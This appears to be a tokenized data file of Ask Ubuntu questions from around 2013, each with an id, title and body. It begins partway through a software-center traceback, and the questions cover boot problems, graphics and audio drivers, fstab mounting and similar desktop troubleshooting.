softwarecenter.backend.scagent import softwarecenteragent file `` /usr/share/software-center/softwarecenter/backend/scagent.py '' , line 28 , in < module > from softwarecenter.distro import get_distro , get_current_arch file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 26 , in < module > from softwarecenter.utils import unimplementederror , utf8 file `` /usr/share/software-center/softwarecenter/utils.py '' , line 48 , in < module > from config import get_config file `` /usr/share/software-center/softwarecenter/config.py '' , line 33 , in < module > class softwarecenterconfig ( object , safeconfigparser ) : file `` /usr/lib/python2.7/abc.py '' , line 87 , in __new__ cls = super ( abcmeta , mcls ) .__new__ ( mcls , name , bases , namespace ) typeerror : error when calling the metaclass bases can not create a consistent method resolution order ( mro ) for bases object , safeconfigparser $ software-center traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 36 , in < module > from softwarecenter.utils import ( file `` /usr/share/software-center/softwarecenter/utils.py '' , line 48 , in < module > from config import get_config file `` /usr/share/software-center/softwarecenter/config.py '' , line 33 , in < module > class softwarecenterconfig ( object , safeconfigparser ) : file `` /usr/lib/python2.7/abc.py '' , line 87 , in __new__ cls = super ( abcmeta , mcls ) .__new__ ( mcls , name , bases , namespace ) typeerror : error when calling the metaclass bases can not create a consistent method resolution order ( mro ) for bases object , safeconfigparser seemingly locale-related errors went away , but i still can not run ubuntu software center , even after attempt to reinstall it . update 4. : after reinstalling some python stuff and correcting order of base classes for softwarecenterconfig , i am getting this : $ software-center 2013-06-09 14:24:06,002 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-06-09 14:24:06,283 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/dbus/proxies.py ' , 410 , '_introspect_error_handler ' ) ' 2013-06-09 14:24:06,283 - dbus.proxies - error - introspect error on com.ubuntu.sso : /com/ubuntu/sso/credentials : dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : process /usr/lib/ubuntu-sso-client/ubuntu-sso-login exited with status 1 traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 130 , in < module > app = softwarecenterappgtk3 ( options , args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 338 , in __init__ self.icons ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/appmanager.py '' , line 66 , in __init__ self.oauth_token = helper.find_oauth_token_sync ( ) file `` /usr/share/software-center/softwarecenter/backend/ubuntusso.py '' , line 141 , in find_oauth_token_sync sso.find_credentials ( ) file `` /usr/share/software-center/softwarecenter/backend/login_impl/login_sso.py '' , line 75 , in find_credentials self.proxy.find_credentials ( self.appname , self._get_params ( ) ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 70 , in __call__ return self._proxy_method ( *args , **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 145 , in __call__ **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : process /usr/lib/ubuntu-sso-client/ubuntu-sso-login exited with status 1
305623	global keyboard shortcut for copy , cut and paste	how can i define a global shortcuts for copy , cut and paste ? i 'm used to mac 's ⌘+c for copy and ⌘+v for paste . they are global , so i can use them interchanging data between cli and gui apps . how can one configure global shortcuts , e.g ⊞ win+c ( copy ) and ⊞+v ( paste ) in ubuntu 12.04 ? update : i 've created a feature request at brainstorm.ubuntu.com
305624	how to declare functions as variables	i want to declare variable with pwd ( ) function , which will give me the current path . i want to use pwd ( ) function as $ { pwd } variable , something like that . how i must write ? thanks !
305633	how can i determine the page count of odt , doc , docx and other office documents from the cli ?	it 's easy to find the page count of a pdf document from the command line : pdfinfo sample.pdf | grep ^pages : ... but i have n't been able to find a similar method for odt files and other office documents . is there a way to programmatically determine the page count of these documents ?
305642	how to dual boot ubuntu	how do i dual boot ubuntu i have windows 7 on my laptop and i inserted my self burned disc and the computer is on boot from disc but it just boots straight to windows 7 . how do i install ubuntu as a dual boot ?
305646	gui for ubuntu server : xfce or xubuntu-desktop	i would like to install a desktop environment on my ubuntu server 12.04 . i like xubuntu-desktop as it is a light-weight one . but i 'm confused between xubuntu-desktop and xfce . can anyone tell me what difference between the two following commands : sudo apt-get install -- no-install-recommends xubuntu-desktop and sudo apt-get install xfce
305649	ubuntu does n't boot after manual bootloader install ( windows 7 dual-boot )	this is the link i got after bootloader rapair : http : //paste.ubuntu.com/5743624/ boot-loader comes up , but after selecting ubuntu i see a black screen . my ssd has 4 partitions : dev/sda1 - ntfs 120 gb ( windows ) dev/sda2 - ext4 12 gb ( ubuntu ) dev/sda4 - extended 2.65 gb ( swap ) dev/sda3 - ntfs 105 gb ( data partition shared by both os )
305650	bash script with execution permissions wo n't run with dbl click	i have a bash script that has permission to execute , but when i double click it in nautilus it wont execute , instead it opens its text in gedit . in properties it says open with : gedit , and that does n't change when i click the reset button what do i have to do to make it execute ? i 'm running ubuntu 13.04 , i never had an issue like this one with 12.04 or with any other distribution in general . edit if i go in terminal and type : ./bashscriptname it runs just fine .
305653	raring does n't boot after efi install	i 'm trying to install 13.04 64-bit server on an amd fusion based system ( c60m1-i ) . installation medium is a usb stick created with unetbootin ( or , better : several of them already ) . ubuntu live boots well , only after installing server/desktop i get a black screen missing operation system . reboot and select proper boot device or insert boot media in selected boot device and press a key i already - tried diverse downloaded images ( including raring desktop ) - partioned the disk using gpt - ran boot-repair boot-repair log : http : //paste.ubuntu.com/5745089 to no avail . but the efi does n't recognise the bootdisk ( sandisk ssd ) as bootable ( does n't show as uefi : sandisk p4 ... in the mainboard setup ) . i have no control over secure boot ( mainboard does n't offer an option ) . how could i get this system booting ? i actually would n't care booting legacy ( bios ) in the end ... thank you for any advice . best constantin edit # 3 : it seems that the problem is , that efibootmgr can not write the boot-entry to the nvram ( seems like a bug with some or many efi boards , at least it is mentioned with different asus models on the web . some folks mention a bug in efibootmgr as well ... will try to figure out ) . i for now sort of worked around it by placing a copy of grubx64.efi to the root of the efi partition and then from the mainboard setup call 'start efi shell from filesystem ' . e voilรก - there 's grub and i can boot . will need to find a complete solution , still . edit # 4 : might have to do with this : sony vaio with insyde h2o efi bios will not boot into grub efi
305654	xclip on headless server	i 've been using xclip to copy the output of bash commands like so : pwd | tr -d `` \n '' | xclip -selection c so that i can then paste the output into another terminal session . i was trying to use it on my headless server ( ubuntu 13.04 ) , which is started without x . it does n't work with the error : error : ca n't open display : ( null ) is there a way around this . i realise that seeing as the program is called xclip it may not be possible .
305656	how do i convert my blackberry contacts to a standard format ?	i want to migrate from blackberry ( rip ) . how do i convert my contacts to a standard format ?
305663	is there an app similar to revouninstaller on windows and appcleaner on os x ?	i use revouninstaller on windows 7 and appcleaner on os x . both have the same purpose of letting you uninstall apps , as well as seeking out left over files or potential related files to the app you are currently uninstalling . is there something like them for ubuntu 13.04 ? i 'm looking for an app that will list all my current installed apps , let me uninstall one and seek out related leftover files .
305664	geforce 9300m gs hdmi audio not working	my laptop seems to no longer support audio over hdmi after upgrade from 10.04 to 12.04. lspci output : 00:00.0 host bridge : intel corporation mobile 4 series chipset memory controller hub ( rev 07 ) 00:01.0 pci bridge : intel corporation mobile 4 series chipset pci express graphics port ( rev 07 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 03 ) 00:1a.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 03 ) 00:1c.1 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 2 ( rev 03 ) 00:1c.3 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 4 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 93 ) 00:1f.0 isa bridge : intel corporation ich9m lpc interface controller ( rev 03 ) 00:1f.2 sata controller : intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 4 port sata controller [ ahci mode ] ( rev 03 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 03 ) 01:00.0 vga compatible controller : nvidia corporation g98 [ geforce 9300m gs ] ( rev a1 ) 04:00.0 network controller : intel corporation wifi link 5100 05:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) sudo aplay -l output default playback/recording through the pulseaudio sound server sysdefault : card=intel hda intel , alc888 analog default audio device front : card=intel , dev=0 hda intel , alc888 analog front speakers surround40 : card=intel , dev=0 hda intel , alc888 analog 4.0 surround output to front and rear speakers surround41 : card=intel , dev=0 hda intel , alc888 analog 4.1 surround output to front , rear and subwoofer speakers surround50 : card=intel , dev=0 hda intel , alc888 analog 5.0 surround output to front , center and rear speakers surround51 : card=intel , dev=0 hda intel , alc888 analog 5.1 surround output to front , center , rear and subwoofer speakers surround71 : card=intel , dev=0 hda intel , alc888 analog 7.1 surround output to front , center , side , rear and woofer speakers iec958 : card=intel , dev=0 hda intel , alc888 digital iec958 ( s/pdif ) digital audio output dmix : card=intel , dev=0 hda intel , alc888 analog direct sample mixing device dmix : card=intel , dev=1 hda intel , alc888 digital direct sample mixing device dsnoop : card=intel , dev=0 hda intel , alc888 analog direct sample snooping device dsnoop : card=intel , dev=1 hda intel , alc888 digital direct sample snooping device hw : card=intel , dev=0 hda intel , alc888 analog direct hardware device without any conversions hw : card=intel , dev=1 hda intel , alc888 digital direct hardware device without any conversions plughw : card=intel , dev=0 hda intel , alc888 analog hardware device with all software conversions plughw : card=intel , dev=1 hda intel , alc888 digital hardware device with all software conversions cat /proc/asound/cards output 0 [ intel ] : hda-intel - hda intel hda intel at 0xfe200000 irq 47 nvidia driver version : 310.14 thanks for help . e
305674	can i show the global menu on all displays ?	let 's say i have a two monitor setup . i open firefox on display # 1 . if i hover my mouse to select a menu item on display # 1 , the global menu will show . but if i hover the mouse to select a menu item on display # 2 nothing will show , unless i move the firefox window to the second display . but then the global menu will not show on display # 1 . can i make the global menu show on all displays , no matter on which display the application is visble ? please note that i do not want to disable the auto-hide feature . edit : adding a reason on why i need this : one of the reasons i ask for this , is because i regularly connect my laptop to my tv set and watch movies ( i use vlc ) . so , most of the times i want to access the menu of vlc without the need of interrupting the playback . and even if i did interrupt the playback , vlc 's playlist can be undocked from the main window , and become a window on its own . so i always keep the playlist on the laptop display , and the movie on full screen on the tv display . and even if the playlist is the active window , since vlc 's main window is on the tv display , the menu would only show on the tv display , and not on the laptop .
305678	startup screen stuck after login done	its a very new install of raring ( ubuntu 13 ) . my only os on a hp dv2600 laptop with 2gb ram & 160gb hdd . my login screen is stuck after the login is done . its like it freezes after the login . it now looks like my wallpaper . please guide me irradiate this problem .
305680	ati mobility radeon hd 4xxx not recognized	i recently installed ubuntu 12.04 alongside win7 on my hp pavillion dv6-2020eg . ubuntu does not recognize my ati mobility radeon hd 4xxx graphics card . it just says `` unknown '' in the information box and also no additional drivers are found . on the other hand the graphics are all working fine , so that might not be a real problem . i also tried ubuntu 13.04 with everything being just the same . cpu : amd turion ( tm ) ii dual-core mobile m500 ă 2 kernel linux 3.5.0-32-generic gnome 3.4.2 a second problem i am facing - issues with suspend mode - might be related to this . i would appreciate it if you could chime in on that other q & a as well if you have any ideas what might be causing these symptoms .
305684	3 special keys on dell inspiron 17r ( 5720 )	i recently purchased a dell inspiron 17r ( 5720 ) . i wiped windows 8 and installed ubuntu 13.04 and everything is working well , except i have 3 buttons on the upper right corner of the keyboard that light when pressed , but do n't register . i tried showkey -a in a terminal window and they do n't send a scancode or keycode . i believe they are special like the power button , multimedia keys and lid switch . has any one found how to customize and/or use these three buttons ? is there a utility to customize the dell wmi hotkeys ?
305687	sound icon not working	i am using ubuntu 13.04. last time i installed pulse-audio-4.0 after which a weird problem started with my sound icon.in sound icon there are two hyphens following the speaker like < | -- i clicked to open it .the trigger is always set to zero and it is stuck there , i ca n't move it . i opened sound from setting , i do n't see any audio device listed . but applications are working and there is no problem with audio output . but when i log out at log in , everything becomes normal . my audio device gets listed , volume tray is responding and i can control volume via that trigger . the problem returns after reboot , i had to log and log out every time . please tell me how to get it fixed permanently ! !
305688	is it possible to use a symbian based nokia phone as a webcam via usb ?	i have a nokia e6 with symbian belle and a pc running ubuntu 12.04 . is it possible to use a symbian based nokia phone as a webcam via usb ?
305690	how can i create an application launcher for a file in gnome 3.6 ?	i downloaded some games from humble indie bundle and now i can open them only from nautilus and not from the applications menu , which is impractical , because usually if i want to play a game i go to `` games '' under the applications menu and decide what to play , or i search the applications menu for it ( from activities ) . i do n't want to have to search two different places .
305691	ubuntu 13.04 pulseaudio does n't load	i have just installed pulseaudio to my new , fresh ubuntu 13.04 , but it does n't start . when i press on pulseaudio equalizer icon , nothing happens . any ideas , what could be wrong ?
305692	where my linux password is stored on my system and how i can retrieve it ?	i am currently logged in on my linux system and i want to output my linux password and username on my terminal , what commands i need to write and in which file it is stored and how i can retrieve it ?
305698	how can i make vim ignore the global config ?	i do not like the settings the sysadmin put in the system vim config file located in /etc/vim/vimrc . how can i avoid loading that file and run my instances of vim with different settings ?
305702	are ubuntu phone apps compatible across different devices ? and if yes , how ?	i know that android apps are developed in java because running all applications in a virtual machine grants less compatibility issues . ios instead uses objective-c because it is developed to run just on few devises ( iphones series ) . how can the ubuntu touch apps be cross compatible being developed in c++ ? is there a compatibility level which can not be crossed or anything similar ?
305706	some entries in ~/.xcompose are ignored . how can i fix that ?	for some reason , i can no longer add custom compose key sequences . i have the file .xcompose in my home folder with content like < multi_key > < equal > < asciitilde > : `` ≅ '' < multi_key > < underscore > < slash > : `` ∠ '' < multi_key > < slash > < underscore > : `` ∠ '' etc . default sequences like the ones that make « á » , etc . work .
305712	how do i auto mount my partition ?	i 've a partition on /dev/sda2 of 279 gb ext4 filesystem , but i 'm not able to auto mount it on login . i 've added the partition entry /dev/sda /home ext4 defaults 0 0 in /etc/fstabt still it does not auto mount . i 've even tried to edit the mount options from disks ( please see the below screenshot ) , yet no results . the udisks command works well but the problem is that , it asks a admin password for standard user . so my question is how do i auto mount this partition or at least grant read write permission to standard user so that they can mount this partition using udisks command . thanks to dschinn1001 i was able to automount my partition by editing the entry in fstab . first i fount the uuid using sudo blkid then edit the fstab file using sudo /etc/fstab add the entry in the following format [ device ] [ mount point ] [ file system type ] [ options ] [ dump ] [ pass ] device will be your uuid mount point will be the location where you want to mount your partition file system type will be displayed when you run blkid command options add the options you need . see options in fstab for more details . dump this value will be zero most cases . see fstab for more details . pass this value will be zero most cases . see fstab for more details . so finally this is how my entry looks like . uuid=fe9ab5ba-35ed-49c5-b1d3-9bfc02060867 /media/mount ext4 auto , user , rw , exec 0 0 save the file and restart your pc . in the options i 've mentioned auto which means auto mount user which means grant standard users to mount partition rw read write permission exec permit the execution of binaries from the filesystem
305714	rsyslogd and system log output weird or normal ?	currently i have this non-stop output in system log : [ 89.115236 ] fw reject ( input ) : in=eth0 out= mac=ff : ff : ff : ff : ff : ff:00:23:5e:6f : ab : d9:08:00 src=10.158.0.1 dst=255.255.255.255 len=389 tos=0x00 prec=0x00 ttl=255 id=51601 proto=udp spt=67 dpt=68 len=369 is this normal or is there somebody behind asa in alabama trying to sniff at mine eth0 ? when i activate ipkungfu -- panic then it disappears after a while , but when ipkungfu -- panic is switched off , then it comes back ... ? ? ? who is that ? how can i find out more ?
305718	lubuntu 13.04 works , except for unpredictable blank screens	i just installed lubuntu 13.04 on my macbook pro 6,2 . it seems to work fine . however , once in a while , when i am logged in and using the computer , the screen will suddenly become blank . ( sound still works -- i know this because one time the screen went blank when i was watching a video . ) does anyone know what might be causing this ? ( i am using the nvidia driver . ) edit : i have installed lubuntu 12.04 to see if this would fix the problem ; however , the unpredictable blank screen problem is still there .
305719	nvidia x server - `` sudo nvidia config '' does not generate a working 'xorg.config '	i am over 18 hours deep on this challenge . i got to this point and am stuck . very stuck . maybe you can figure it out ? ubuntu version 12.04 lts with all the updates installed . problem : the default settings in `` etc/x11/xorg.conf '' that are generated by the `` nvidia-xconfig '' tool , do not allow the nvidia x server to connect to the driver in my `` system settings > additional driver window '' . ( that 's how i understand it . lots of information below ) . symptoms of problem '' system settings > additional driver '' window has drivers , but the nvidia x server can not connect/utilize any of the 4 drivers . the drivers are activated , but not in use . when i go to `` system tools > administration > nvidia x server settings '' i get an error that basically tells me to create a default file to initialize the nvidia x server ( screen shot below ) . this is the messages the terminal gives after running a `` sudo nvidia-xconfig '' command for the first time . it seems that the generated file by the tool i just ran is generating a bad/unusable file : if i run the `` sudo nvidia-xconfig '' command again , i wont get an error the second time . however when i reboot , the default file that is generated ( etc/x11/xorg.conf ) simply puts the screen resolution at 800 x 600 ( or something big like that ) . when i try to go to nvidia x server settings i am greeted with the same screen as the screen shot as in symptom 2 ( no option to change the resolution ) . if i try to go to `` system settings > display '' there are no other resolutions to choose from . at this point i must delete the newly minted `` xorg.conf '' and reinstate the original in its place . here are the contents of the `` xorg.conf '' that is generated first ( the one missing required information ) : # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 304.88 ( buildmeister @ swio-display-x86-rhel47-06 ) wed mar 27 15:32:58 pdt 2013 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection hardware : i ran the `` lspci|grep vga '' . there results are : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf108 [ quadro 1000m ] ( rev a1 ) more hardware info : ram : 16gb cpu : intel core i7-2720qm @ 2.2ghz * 8 other : 64 bit . this is a triple boot computer and not a vm . attempts with not success on my end : 1 ) tried to append the `` xorg.conf '' with what i perceive is missing information and obviously it did n't fly . 2 ) all the other stuff i tried got me to this point . 3 ) see if this link is helpful to you ( i barely get it , but i get enough knowing that a smarter person might find this useful ) : http : //manpages.ubuntu.com/manpages/lucid/man1/nvidia-xconfig.1.html 4 ) i am completely new to linux ( 40 hours over past week ) , but not to programming . however i am very serious about changing over to linux . when you respond ( i hope someone responds ... ) please respond in a way that a person new to linux can understand . 5 ) by the way , the reason i am in this mess is because i must have a second monitor running from my laptop , and `` system settings > display '' does n't recognize my second display . i know it is possible to make the second display work in my system , because when i boot from the install cd , i perform work on the native laptop monitor , but the second monitor shows a purple screen with ubuntu in the middle , so i know the vga port is sending a signal out . if this is too much for you to tackle please suggest an alternative method to get a second display . i do n't want to go to windows but i can not have a single display . i am really fudged here . i hope some smart person can help . thanks in advance . mike . **********************edit # 1********************** more details about graphics card i was asked `` which brand of nvidia-card do you have exactly ? '' here is what i did to provide more info ( maybe relevant , maybe not , but here is everything ) : 1 ) took my lenovo w520 right apart to see if there is an identifier on the actual card . however i realized that if i get deep enough to take a look , the laptop `` wo n't like it '' . so i put it back together . figuring out the card this way is not an option for me right now . 2 ) ( my computer is triple boot ) i logged into win7 and ran 'dxdiag ' command . here is the screen shot : 3 ) i tried to look on the lenovo website for more details ... but no luck . i took a look at my receipts and here is info form receipt : system unit : w520 nvidia quadro 1000m 2gb 4 ) in win7 i went to the nvidia website and used the option to have my card 'scanned ' by a java applet to determine the latest update for my card . i tried the same with ubuntu but i ca n't get the applet to run . here is the recommended driver from from the nvidia applet for my card for win7 ( i hope this shines some light on the specifics of the card ) : quadro/nvs/tesla/grid desktop driver release r319 version : 320.00 whql release date : 3.5.2013 5 ) also i went on the nvidia driver search and looked through every possible combination of product type + product series + product to find all the combinations that yield a 1000m card . my card is : product type : quadro product series : quadro series ( notebooks ) product : 1000m ***********************edit # 2******************* additional symptoms another question that generated more symptoms i previously did n't mention was : '' after generating xorg.conf by nvidia-xconfig , go to additional drivers , do you see nvidia-304 ? '' 1 ) i took a screen shot of the `` additional drivers '' right after generating xorg.conf by nvidia-xconfig . here it is : 2 ) then i did a reboot . now ubuntu is 600 x 800 resolution . when i logged in after the computer came up i got an error ( which i always get after generating xorg.conf by nvidia-xconfig and rebooting ) 3 ) to finally answer the question - no . there is no `` nvidia-304 '' driver . screen shot of additional drivers after generating xorg.conf by nvidia-xconfig and rebooting : at this point i revert to the original xorg.conf and delete the xorg.conf generated by nvidia .
305723	issue with php5-curl installation	i currently have php 5.4.14-1~quantal+1 ( cli ) installed on my ubuntu 13.04 i tried to install php5-curl but i have a dependency issue $ sudo apt-get update $ sudo apt-get upgrade $ sudo apt-get install php5-curl '' php5-curl : depend : php5-common ( = 5.4.9-4ubuntu2 ) but 5.4.14-1~quantal+1 should be installed '' do someone has any idea how to fix this problem ?
305724	how do i install ubuntu studio 13.04 from a dvd ?	i burned the 32-bit iso image to a blank dvd . so next , i put the dvd ( with all its contents ) into the drive and when i open it , there are a bunch of different folders . if i try to open any file in a folder , it says : could not display `` /media/ubuntu-studio 13.04 i386/install/mt86plus '' . '' and the file is of an unknown type . what do i do ? is there a specific software i need just to install it ? sort of like a catalyst ?
305728	how can i configure an epsom xp-300 printer on ubuntu ?	i have just bought an epson xp-300 laser printer and i ca n't get it to work properly on ubuntu . i 'm a complete novice when it comes to ubuntu and linux , so i basically went to `` printers '' and tried configuring it that way but my printer model does n't even appear on the list . when i try using the `` generic '' configuration it either does n't print or just prints out gibberish . this is really frustrating . what can i do to get this printer to work properly under ubuntu ?
305729	why am i getting higher pitched audio when playing videos in ubuntu ?	this is a weird question , but it is really happening . i was watching breaking bad in the totem player , and walter white 's voice was sounding slightly higher than normal . it was n't enough for me to think twice about it . i also noticed it when i was watching youtube . everyone 's voice is higher whenever i am playing sound . i have absolutely no idea what could cause this , and i do not know how i could provide information on my ubuntu settings that might cause this . does anyone have an idea of what this may be ? i am assuming it is happening with all audio , just only noticeable with people 's voices . if there is something else i can add here to help you answer this question please let me know . i am using ubuntu 13.04
305734	12.04.2 lts 32-bit server does not start graphic interface in vmware 5.0 ?	on a windows 7 system , i installed vmware 5.0 and tried to install the 32-bit server lts flavour of ubuntu . after the install completed , it only starts in console instead of the usual gui . how do i get the gui to appear ? the install did not ask for the root password ?
305735	unable to boot after successful upgrade ?	i performed an upgrade by using apt-get upgrade . the upgrade completed successfully , but after a reboot , ubuntu is not booting past the grub menu . when i tried to boot using recovery mode from grub i got the following error messages : init line 69 : ca n't open /scripts/functions kernal panic - not syncing : attempted to kill init ; pid:1 , comm : init not turned 3.2.0-45-generic-pae # 70 ubuntu
305737	keep loosing audio output ( time to reinstall xp ? )	i 've very frustrated with xubuntu , like it but it keep loosing sound . about ready to throw in the towel , zap disc & reinstall ms xp ! ! ! checked sound not muted on pa volume control ! ! help ... ..
305741	ca n't close xbmc , on ubuntu 13.04 x64	all is well when i open xbmx ( but even if i just open it by accident and i do n't do anything in xbmc itself ) when i try to close it ( either via the 'x ' at the top left to close the application , or via the built-in menu ) xbmc just hangs and will not quit unless i restart my machine ( which is obviously a pain ) - after i 've asked to close with one of the ways mentioned the window becomes completely frozen and i ca n't do anything with it ( apart from drag it from window to window or workspace to workspace , just so it 's out the way ) and i then ca n't open another instance of xbmc either . the only plug-ins i have are : 1channel mashup +any default/preloaded ones that i do n't use anyone else having this issue ? thanks , jon
305744	how do you run netscape 2 on ubuntu 13.04 ?	i 've been trying to follow the instructions here to get netscape 2 to run on ubuntu 13.04 . i created a file called `` netscape2.conf '' to /etc/modeprobe.d and put this in it : alias binfmt-0064 binfmt_aout then i downloaded the tarball they provided and extracted that in the root directory . finally i downladed netscape 2 and extracted it . however , when i try to run it as a normal user it just spits out `` killed '' to the terminal . if i use sudo to run it then it says ./netscape : ca n't find library 'libm.so.4' ok so i explicitly add the paths to the $ path variable using export and try again . same problem . what am i doing wrong ? is it still possible to run this ancient browser on modern ubuntu ? edit ok thanks to paul i 've got past that error message . in /etc/ld.so.conf.d i created a file called netscape2.conf and put the lib directories in it like so : /usr/i486-linuxaout/lib /usr/i486-linux-libc5/lib i then did ldconfig to update the libraries as suggested . the next error was because xkeysymdb was n't found . it told me to fix this i just had to set the $ xkeysymdb variable , which i did . now the next error is : warning : can not convert string `` -*-helvetica-bold-r-*-*-*-120-*-*-*-*-iso8859-* '' to type fontstruct warning : can not convert string `` -*-courier-medium-r-*-*-*-120-*-*-*-*-iso8859-* '' to type fontstruct segmentation fault ( core dumped ) this sounds like i do n't have the right fonts installed . so does anyone know what the right fonts , where i can get them and how to install them ?
305747	qt4/5 creator can not find -lgl	i installed the ubuntu mobile sdk a while ago on my ubuntu 13.04 machine via http : //developer.ubuntu.com/get-started/ after a few days there appeared a compiler/linker error - even when compiling the standard gui project for qt : can not find -lgl collect2 : error : ld returned 1 exit status a non qt c++ hello world project compiles and pretends to start ( it says in the ide starting ) but it never says `` hello world '' or even quits . also the qt-creator suddenly had a weird bug . when i clicked on `` develop '' a few non-closeable windows appeared showing like a screenshot of the qt creator window . i could not find out what happened , so i decided to uninstall the sdk and return to the standard software center qt creator version . i used ppa-purge on the sdk ppa 's and so i uninstalled the sdk ... i hope . but i still get the same errors . only that weird bug disappeared . i also tried apt-get purge on the qt creator but it did not seem to work ( no settings were lost after reinstalling ) . i thought maybe i should try installing the sdk again , but i heard it 's complicated when i mix up qt4 and qt5 stuff . so i decided to ask for an answer here . so , my question is , how can i get qt creator working again ? i do n't really care whether i use qt4 or qt5 . i did not write that much so this is no problem . i 'd prefer qt5 , though . thank you .
305749	after removing smart scopes unity with active blur becomes very slow	before testing smart scopes my computer ran unity perfectly . the dash opened instantly when either pressing the super key or clicking the icon . i tried out smart scopes and attempted to use it but unity became incredibly slow to open , nothing like it shows in the demo videos . it would take about 5 seconds to open unity and even longer to search . i removed smart scopes and the problem persisted . enabling static blur or no blur in compiz config settings manager speeds unity back up but i want unity to be functioning the way it was before with active blur . my computer specs are more than enough to run unity . intel core i7-3520m cpu @ 2.90ghz ă 4 intel ivybridge mobile graphics 8 gbs of ram
305758	minecraft causes ubuntu 13.04 to freeze	i have recently installed ubuntu 13.04 and when i try to run minecraft , after a few minutes the whole system freezes and i have to hold down the power button on my laptop and reboot as the laptop just completely stops responding . i have tried with openjdk 6 & 7 and it crashes with both . i have tried removing mods , but it still happens . is there any way that i can stop this from happening ? i am using the following graphics card : 00:01.0 vga compatible controller : advanced micro devices [ amd ] nee ati sumo [ radeon hd 6380g ] i tried deleting the game data , and that did nothing . ctrlaltf1 also did nothing after the crash , but for some reason my laptop refused to turn back on for a bit afterwards when i tried that command .
305766	how can i upgrade from an older version of ubuntu ?	i was delighted with ubuntu 8.1 on my old desktop machine , however when i tried to upgrade to 12.04 everything slowed down . i tried the light ubuntu version of it , but the system seems very slow anyway , sometimes hanging for seconds , and without the capability of interfacing existing printers . to try an intermediate release , should i reinstall first the 8.10 version ? some trial to upgrade `` on line '' did n't work , should i copy the upgrade on to a cd and start the pc from this disk ?
305767	how i can create shortcut for maximize-minimize window in lubuntu ?	in lubuntu-rc.xml lubuntu does n't have hotkey for maximize window .
305771	how can i sort files in nautilus by modified date ?	i want to sort files in nautilus by modified date , similar to sorting files by modified date in windows explorer : how can i sort files in nautilus by modified date ?
305772	pressing print screen results in a completely white screenshot ?	suddenly today , any screenshots taken with printscreen have turned all white . all the screenshots come in as plain white sheets . i had a similar error in 12.10 earlier where they had turned black ! now in 13.04 they are white . i did take some screenshots yesterday and they were fine . it changed today . what might be wrong ?
305775	change my ubuntu 12.04 to 13.04	currently i am runing ubuntu 12.04.i installed ubntu 13.04 on a usb with unetbootin and now i want to change my ubuntu 12.04 to ubuntu 13.04.how can i format root partition and install ubuntu 13.04 ? i dont want to lose my /home data thank you
305780	help with installing and how to confirm successful installation of clamav ?	i have just researched and attempted to install clamav as an antivirus program on my ubuntu install using these two articles : clam av package download page how do i install the latest clamav & clamtk ? these pages seem to indicate that clam av ships with ubuntu 12.04 . i was sent to the ubuntu button by alt-f2 and then searched and found software sources . i was told that changing these settings installed clam av . all that was done but i ca n't find an icon or some other way of working with the program and doing scans , updating or doing scans as i do in norton . how do i know it has loaded and is working ?
305787	how to check a .deb file installable or not using command line	how can i check a *.deb file is good to install in current system without install it ? is there any way that i can use dpkg or apt-get or other command line tools for this purpose ? note : i need to do this using command line ( no gui or synaptic ) and there may have multiple deb files . if dpkg -- check *.deb == true dpkg -i *.deb else perror
